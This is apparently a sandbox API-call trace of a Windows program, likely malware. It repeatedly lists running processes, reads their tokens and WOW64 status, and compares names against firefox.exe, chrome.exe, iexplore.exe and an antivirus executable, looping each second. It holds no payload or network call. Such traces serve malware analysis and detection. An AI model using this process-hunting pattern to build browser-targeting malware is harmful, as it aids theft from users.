OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0153.330] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0153.330] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0153.330] GetLastError () returned 0x7a [0153.330] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0153.330] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0153.330] CloseHandle (hObject=0x2ec) returned 1 [0153.330] CloseHandle (hObject=0x2f0) returned 1 [0153.330] GetLengthSid (pSid=0x54010a8) returned 0x1c [0153.330] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0153.330] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0153.330] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0153.330] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0153.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0153.331] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0153.331] CloseHandle (hObject=0x2f0) returned 1 [0153.331] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0154.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf730) returned 0xc0000004 [0154.347] VirtualAlloc (lpAddress=0x0, dwSize=0x10730, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0154.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10730, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0154.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0154.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0154.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0154.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0154.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0154.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0154.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0154.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0154.351] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0154.351] CloseHandle (hObject=0x2f0) returned 1 [0154.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0154.351] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0154.351] CloseHandle (hObject=0x2f0) returned 1 [0154.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0154.351] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0154.351] CloseHandle (hObject=0x2f0) returned 1 [0154.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0154.351] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0154.351] CloseHandle (hObject=0x2f0) returned 1 [0154.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0154.351] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0154.352] CloseHandle (hObject=0x2f0) returned 1 [0154.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0154.352] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0154.352] CloseHandle (hObject=0x2f0) returned 1 [0154.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0154.352] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0154.352] CloseHandle (hObject=0x2f0) returned 1 [0154.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0154.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0154.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0154.352] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0154.352] CloseHandle (hObject=0x2f0) returned 1 [0154.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0154.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0154.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0154.352] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0154.353] CloseHandle (hObject=0x2f0) returned 1 [0154.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0154.353] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0154.353] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0154.353] GetLastError () returned 0x7a [0154.353] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0154.353] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0154.353] CloseHandle (hObject=0x2ec) returned 1 [0154.353] CloseHandle (hObject=0x2f0) returned 1 [0154.353] GetLengthSid (pSid=0x54010a8) returned 0x1c [0154.353] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0154.353] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0154.353] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0154.353] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0154.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0154.354] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0154.354] CloseHandle (hObject=0x2f0) returned 1 [0154.354] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0155.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf730) returned 0xc0000004 [0155.346] VirtualAlloc (lpAddress=0x0, dwSize=0x10730, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0155.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10730, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0155.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0155.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0155.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0155.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0155.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0155.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0155.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0155.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0155.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0155.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0155.352] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0155.352] CloseHandle (hObject=0x2f0) returned 1 [0155.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0155.352] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0155.352] CloseHandle (hObject=0x2f0) returned 1 [0155.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0155.352] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0155.352] CloseHandle (hObject=0x2f0) returned 1 [0155.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0155.352] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0155.352] CloseHandle (hObject=0x2f0) returned 1 [0155.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0155.352] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0155.353] CloseHandle (hObject=0x2f0) returned 1 [0155.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0155.353] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0155.353] CloseHandle (hObject=0x2f0) returned 1 [0155.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0155.353] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0155.353] CloseHandle (hObject=0x2f0) returned 1 [0155.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0155.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0155.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0155.353] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0155.353] CloseHandle (hObject=0x2f0) returned 1 [0155.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0155.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0155.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0155.354] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0155.354] CloseHandle (hObject=0x2f0) returned 1 [0155.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0155.354] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0155.354] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0155.354] GetLastError () returned 0x7a [0155.354] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0155.354] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0155.354] CloseHandle (hObject=0x2ec) returned 1 [0155.354] CloseHandle (hObject=0x2f0) returned 1 [0155.354] GetLengthSid (pSid=0x54010a8) returned 0x1c [0155.354] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0155.355] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0155.355] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0155.355] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0155.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0155.355] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0155.355] CloseHandle (hObject=0x2f0) returned 1 [0155.355] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0156.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf730) returned 0xc0000004 [0156.371] VirtualAlloc (lpAddress=0x0, dwSize=0x10730, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0156.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10730, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0156.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0156.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0156.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0156.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0156.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0156.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0156.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0156.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0156.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0156.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0156.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0156.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0156.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0156.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0156.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0156.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0156.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0156.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0156.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0156.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0156.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0156.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0156.378] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0156.378] CloseHandle (hObject=0x2f0) returned 1 [0156.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0156.378] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0156.378] CloseHandle (hObject=0x2f0) returned 1 [0156.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0156.378] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0156.379] CloseHandle (hObject=0x2f0) returned 1 [0156.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0156.379] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0156.379] CloseHandle (hObject=0x2f0) returned 1 [0156.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0156.379] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0156.379] CloseHandle (hObject=0x2f0) returned 1 [0156.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0156.379] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0156.380] CloseHandle (hObject=0x2f0) returned 1 [0156.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0156.380] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0156.380] CloseHandle (hObject=0x2f0) returned 1 [0156.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0156.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0156.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0156.380] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0156.380] CloseHandle (hObject=0x2f0) returned 1 [0156.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0156.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0156.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0156.381] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0156.381] CloseHandle (hObject=0x2f0) returned 1 [0156.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0156.381] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0156.381] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0156.381] GetLastError () returned 0x7a [0156.382] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0156.382] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0156.382] CloseHandle (hObject=0x2ec) returned 1 [0156.382] CloseHandle (hObject=0x2f0) returned 1 [0156.382] GetLengthSid (pSid=0x54010a8) returned 0x1c [0156.382] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0156.382] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0156.382] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0156.382] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0156.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0156.383] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0156.383] CloseHandle (hObject=0x2f0) returned 1 [0156.383] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0157.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf5a0) returned 0xc0000004 [0157.377] VirtualAlloc (lpAddress=0x0, dwSize=0x105a0, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0157.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x105a0, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0157.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0157.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0157.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0157.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0157.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0157.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0157.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0157.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0157.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0157.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0157.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0157.383] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0157.383] CloseHandle (hObject=0x2f0) returned 1 [0157.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0157.383] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0157.383] CloseHandle (hObject=0x2f0) returned 1 [0157.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0157.383] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0157.383] CloseHandle (hObject=0x2f0) returned 1 [0157.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0157.384] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0157.384] CloseHandle (hObject=0x2f0) returned 1 [0157.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 